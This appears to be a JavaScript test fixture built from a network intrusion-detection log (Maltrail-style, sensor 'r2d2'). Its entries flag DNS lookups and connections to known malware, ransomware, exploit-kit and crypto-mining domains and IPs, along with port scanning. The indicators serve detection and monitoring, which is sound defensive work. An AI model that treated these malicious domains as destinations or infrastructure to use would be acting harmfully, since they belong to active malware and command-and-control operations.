    '"2021-01-11 00:51:20.671602" r2d2 173.194.170.69 59813 2.200.104.43 53 UDP DNS (4d38ff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:20.671594" r2d2 173.194.170.69 59813 2.200.104.43 53 UDP DNS (4d38ff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:28.987685" r2d2 10.43.192.103 55576 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:51:47.018034" r2d2 10.43.192.103 55589 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:51:51.405466" r2d2 2.200.110.233 65465 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 00:51:51.411314" r2d2 2.200.107.146 49607 3.92.64.194 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 00:51:53.076686" r2d2 10.43.192.103 55598 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:52:16.857762" r2d2 2.200.110.233 65095 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 00:52:16.879271" r2d2 2.200.110.233 64490 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:52:16.881919" r2d2 2.200.107.146 5294 156.154.127.70 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:52:17.184661" r2d2 10.43.192.103 55637 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:52:17.325330" r2d2 2.200.110.232 64350 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:52:23.234312" r2d2 10.43.192.103 55638 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:52:26.687388" r2d2 2.200.110.233 63369 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:52:34.520868" r2d2 2.200.108.98 58526 2.23.97.219 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:52:35.299428" r2d2 10.43.192.103 55640 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:52:35.907681" r2d2 2.200.110.232 64843 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:52:36.200109" r2d2 2.200.110.233 64405 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:52:34.635900" r2d2 2.200.108.98 58526 2.23.97.219 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:52:34.520861" r2d2 2.200.108.98 58526 2.23.97.219 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:52:43.382246" r2d2 2.200.110.232 63437 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:52:34.887018" r2d2 2.200.108.98 58526 2.23.97.219 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:52:37.224122" r2d2 2.200.108.98 58526 2.23.97.219 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:52:53.412480" r2d2 10.43.192.103 55645 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:52:59.437167" r2d2 10.43.192.103 55646 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:52:59.620463" r2d2 2.200.110.232 63836 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:52:59.624682" r2d2 2.200.107.146 31994 52.50.73.4 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:53:11.487518" r2d2 10.43.192.103 55648 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:53:26.728646" r2d2 2.200.110.233 63588 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:53:27.358256" r2d2 2.200.110.232 64135 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:53:27.386161" r2d2 2.200.110.233 63614 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:53:29.620670" r2d2 10.43.192.103 55651 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:53:31.000370" r2d2 2.200.108.59 21271,21273,21276,21279,21283,21284,21287,21292,21295,21298,21301,32910,33504,33600,33648,35504,35690,35882,35988,36206,36606,36662,37072,37254,37636,38385,38386,38387,38440,39064,39158,39160,39220,39616,41826,42164,42528,42970,43050,43148,43164,43386,43524,43532,43692,43772,44524,44688,44691,44693,44694,44696,44720,45212,45988,46128,46158,48034,48312,48420,48978,49008,49454,49536,49570,49592,50166,50350,50458,51208,51422,51546,51658,51800,51828,51972,52000,52706,53408,53710,54032,55352,55358,55620,56154,56426,56550,56552,57306,57584,57590,57692,58654,58776,59236,59994,60492,60648 77.53.81.105 21,5427,5448,5484,6204,6454,7740,8045,10935,11386,11628,12075,12519,13668,15224,15670,15768,15943,16101,17048,17556,19471,20026,20189,20531,20692,21945,23216,23234,23642,23682,24691,25753,26331,26982,27280,27814,28013,28934,30620,31154,32616,33491,35589,36734,37189,37195,37396,38907,39154,40444,41311,41398,41433,41546,42536,44027,44490,44855,45699,46213,46838,48867,50090,50390,50972,52321,52622,54227,54391,54400,54958,55427,56017,56658,58708,59063,59588,60189,62948,63351,64777 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:53:36.615369" r2d2 2.200.110.233 63417 2.200.107.168 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 00:53:36.616873" r2d2 2.200.107.146 1083 45.175.22.4 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 00:53:31.000444" r2d2 2.200.108.59 21270,21273,21274,21275,21276,21277,21279,21280,21281,21282,21284,21285,21286,21287,21289,21290,21293,21294,21297,21298,21299,21300,32910,33504,34372,34636,35132,35138,35748,36122,36390,36416,37072,37254,37636,38282,38328,38388,38389,38440,38454,38700,39354,39482,39616,40418,40528,40558,41066,41602,41986,43050,43148,43524,43688,44678,44688,44692,44693,44695,44698,45212,45594,45664,45886,46260,46434,47150,47562,48034,48248,48686,48760,49008,49252,49446,49454,50166,50744,50978,50990,51208,51422,51546,51658,52706,52790,53260,53968,54334,54552,54990,55098,55620,56286,56426,57056,57358,57590,57652,58654,59740,59820,60740 77.53.81.105 21,5484,5708,6309,6811,6854,6882,7787,10248,10935,11205,11232,12519,14323,17048,17287,17335,19523,20026,20102,20692,21747,21945,22885,23408,23450,24078,25767,26331,26982,27280,27879,28446,28666,28718,29672,30620,31154,32363,34246,35589,36654,36861,37195,37396,39154,39671,39714,41433,41546,42927,43183,43532,45076,45649,47415,49134,51201,51512,52052,52061,52915,53177,54227,54391,55427,55848,55900,56017,56441,56591,56658,57353,61087,62915,64777 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:53:32.000188" r2d2 2.200.108.59 21288,21289,21290,21291,21292,21295,21296,21297,21300,33172,33600,33648,34232,34372,34636,34900,35132,35786,35882,36122,37318,38282,38388,38454,39220,39290,39354,39482,40418,40528,40558,41066,41602,41714,42164,42970,43386,43688,44524,44694,44696,44697,44888,45664,45988,46046,46128,46158,46354,47384,47396,47562,48760,48978,49446,49592,50978,51800,51972,52124,52920,53260,53408,53968,54200,54268,54334,54552,55358,55626,56042,56154,56244,56248,56552,57056,57358,57584,59236,60492,60740,60766,60854,60900 77.53.81.105 21,5427,5448,6882,7787,7992,8045,8705,9906,10248,11232,11628,12075,14323,15768,15943,17335,20189,20937,23450,24078,26903,27814,28013,28446,28934,30107,30233,30702,33491,33565,34246,35858,36654,36799,37189,38617,40129,41708,42536,42927,43532,44027,44441,45076,49134,50209,50390,51201,51512,51858,52052,52061,52321,52915,53177,54400,54958,55244,55835,55848,55900,56310,56441,56591,57353,57914,58708,59063,59588,60073,61868,62371,62948 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:53:41.683629" r2d2 10.43.192.103 55653 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:53:47.707320" r2d2 10.43.192.103 55656 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:53:48.007982" r2d2 2.200.105.226 57747 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:53:48.008033" r2d2 2.200.105.226 57747 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:53:48.008098" r2d2 2.200.105.226 57747 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:53:59.613174" r2d2 2.200.110.232 64613 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:54:04.558223" r2d2 10.1.19.42 59018 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:54:05.821984" r2d2 10.43.192.103 55659 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:54:07.476447" r2d2 178.17.174.14 44572 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2; FunWebProducts\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:54:07.476443" r2d2 178.17.174.14 44572 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2; FunWebProducts\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:54:07.476446" r2d2 178.17.174.14 44572 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2; FunWebProducts\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:54:17.610930" r2d2 10.3.160.42 14680 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:54:17.710359" r2d2 10.3.160.42 14680 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:54:17.810855" r2d2 10.3.160.42 14680 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:54:17.887780" r2d2 10.43.192.103 55661 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:54:18.310518" r2d2 10.3.160.42 14680 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:54:23.925983" r2d2 10.43.192.103 55662 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:54:36.017100" r2d2 10.43.192.103 55664 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:54:37.389469" r2d2 2.200.110.232 64828 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:54:37.390995" r2d2 2.200.107.146 62596 45.54.64.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:54:37.417481" r2d2 2.200.110.233 63358 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:54:46.631243" r2d2 2.200.110.232 63783 2.200.107.169 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:54:46.639832" r2d2 2.200.110.232 64130 2.200.107.169 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 00:54:46.640356" r2d2 2.200.110.232 65515 2.200.107.169 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:54:46.646387" r2d2 2.200.107.146 47777 194.169.218.42 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:54:46.655817" r2d2 2.200.110.233 65528 2.200.107.168 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:54:46.677150" r2d2 2.200.110.233 65242 2.200.107.168 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 00:54:46.710157" r2d2 2.200.110.232 65252 2.200.107.169 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:54:46.699687" r2d2 2.200.110.232 65179 2.200.107.169 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:54:46.744621" r2d2 2.200.110.233 64638 2.200.107.168 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:54:46.800042" r2d2 2.200.110.232 63524 2.200.107.169 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 00:54:46.819767" r2d2 2.200.110.232 64473 2.200.107.169 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 00:54:46.869766" r2d2 2.200.110.232 63740 2.200.107.169 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 00:54:46.921278" r2d2 2.200.110.232 64866 2.200.107.169 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:54:46.939995" r2d2 2.200.110.232 64283 2.200.107.169 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:54:47.069283" r2d2 2.200.110.232 64063 2.200.107.169 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 00:54:54.142458" r2d2 10.43.192.103 55667 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:55:06.230105" r2d2 10.43.192.103 55669 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:55:12.270578" r2d2 10.43.192.103 55670 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:55:13.217880" r2d2 178.17.174.14 48422 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727; AskTbWBR/5.13.1.18107; BRI/1; FunWebProducts; BOIE8;ENUS\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:55:24.342516" r2d2 10.43.192.103 55672 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:55:26.754236" r2d2 10.1.19.42 59026 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:55:41.956780" r2d2 2.200.107.248 19255 8.8.8.8 53 UDP DNS (update).drp.su "pua (suspicious)" (static)\n' +
    '"2021-01-11 00:55:41.956792" r2d2 2.200.107.248 19255 8.8.8.8 53 UDP DNS (update).drp.su "pua (suspicious)" (static)\n' +
    '"2021-01-11 00:55:43.381756" r2d2 2.200.110.232 65362 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:55:43.394705" r2d2 2.200.110.232 64968 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:55:43.399696" r2d2 2.200.107.146 11265 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:55:47.423436" r2d2 2.200.110.233 63679 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:55:48.498608" r2d2 10.43.192.103 55681 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:55:54.533487" r2d2 10.43.192.103 55682 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:55:58.271819" r2d2 178.17.174.14 51688 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SearchToolbar 1.2; GTB7.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FunWebProducts; .NET4.0C; .NET4.0E\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:55:58.271813" r2d2 178.17.174.14 51688 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SearchToolbar 1.2; GTB7.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FunWebProducts; .NET4.0C; .NET4.0E\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:56:05.883889" r2d2 2.200.110.232 63658 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:56:05.890559" r2d2 2.200.107.146 20853 52.58.214.33 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:56:05.919026" r2d2 2.200.110.233 63600 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:55:58.271817" r2d2 178.17.174.14 51688 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SearchToolbar 1.2; GTB7.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FunWebProducts; .NET4.0C; .NET4.0E\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:56:12.654602" r2d2 10.43.192.103 55687 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:56:24.733615" r2d2 10.43.192.103 55689 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:56:30.778697" r2d2 10.43.192.103 55690 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:56:40.964746" r2d2 2.200.107.146 24804 199.254.31.1 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 00:56:42.845798" r2d2 10.43.192.103 55692 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:56:49.263301" r2d2 2.200.110.232 63463 2.200.107.169 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 00:56:49.663147" r2d2 2.200.110.232 49472 2.200.107.169 53 UDP DNS (webservice).reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 00:56:56.674922" r2d2 2.200.110.233 63432 2.200.107.168 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:56:56.714165" r2d2 2.200.110.232 64269 2.200.107.169 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 00:56:56.750409" r2d2 2.200.110.233 64304 2.200.107.168 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 00:56:56.755471" r2d2 2.200.110.233 64720 2.200.107.168 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:56:57.433744" r2d2 2.200.110.232 63883 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:56:57.461928" r2d2 2.200.110.233 64078 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:56:59.607843" r2d2 2.200.110.232 64344 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:56:59.609584" r2d2 2.200.107.146 21216 204.16.253.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:57:00.964448" r2d2 10.43.192.103 55695 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:57:12.233025" r2d2 2.200.109.58 11279 192.5.5.241 53 UDP DNS (367n.95592).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:57:12.258699" r2d2 2.200.109.58 43065 97.74.105.16 53 UDP DNS (367n.95592).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:57:12.285921" r2d2 2.200.109.58 46441 192.5.5.241 53 UDP DNS (95592).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:57:12.361554" r2d2 2.200.109.58 8740 97.74.105.16 53 UDP DNS (367n.95592).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:57:13.031155" r2d2 10.43.192.103 55697 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:57:19.078607" r2d2 10.43.192.103 55698 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:57:31.177040" r2d2 10.43.192.103 55700 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:57:49.287437" r2d2 10.43.192.103 55703 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:57:52.698556" r2d2 2.200.109.50 61846 8.8.8.8 53 UDP DNS (sv1.iotak).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:57:51.568955" r2d2 178.17.174.14 34198 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; FunWebProducts; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; FunWebProducts; .NET4.0E; BRI/2\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:57:55.315829" r2d2 10.43.192.103 55705 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:57:59.622554" r2d2 2.200.110.232 64506 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:58:01.351741" r2d2 10.43.192.103 55706 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:58:05.727826" r2d2 2.200.110.232 64505 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 00:58:06.526159" r2d2 2.200.110.232 63849 2.200.107.168 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 00:58:06.894867" r2d2 2.200.110.232 49393 2.200.107.168 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 00:58:07.467737" r2d2 2.200.110.233 64019 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:58:13.451048" r2d2 10.43.192.103 55708 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:58:26.646788" r2d2 2.200.110.232 65363 2.200.107.168 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 00:58:31.571454" r2d2 10.43.192.103 55711 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:58:43.387637" r2d2 2.200.110.232 49418 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:58:49.714981" r2d2 10.43.192.103 55716 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:59:01.792086" r2d2 10.43.192.103 55719 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:59:13.866371" r2d2 10.43.192.103 55721 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:59:16.759293" r2d2 2.200.110.232 64926 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:59:16.791620" r2d2 2.200.110.233 65212 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:59:16.928750" r2d2 2.200.110.232 65162 2.200.107.168 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 00:59:16.980105" r2d2 2.200.110.233 63798 2.200.107.169 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 00:59:16.808361" r2d2 10.1.19.42 59076 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:59:17.468026" r2d2 2.200.110.232 63677 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:59:17.472501" r2d2 2.200.107.146 13984 204.16.253.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:59:17.504156" r2d2 2.200.110.233 64284 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:59:19.911487" r2d2 10.43.192.103 55722 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:59:26.808077" r2d2 2.200.110.232 64932 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:59:31.972109" r2d2 10.43.192.103 55724 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:59:50.087546" r2d2 10.43.192.103 55727 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:59:59.607336" r2d2 2.200.110.232 64999 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:59:59.608841" r2d2 2.200.107.146 17688 194.62.183.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
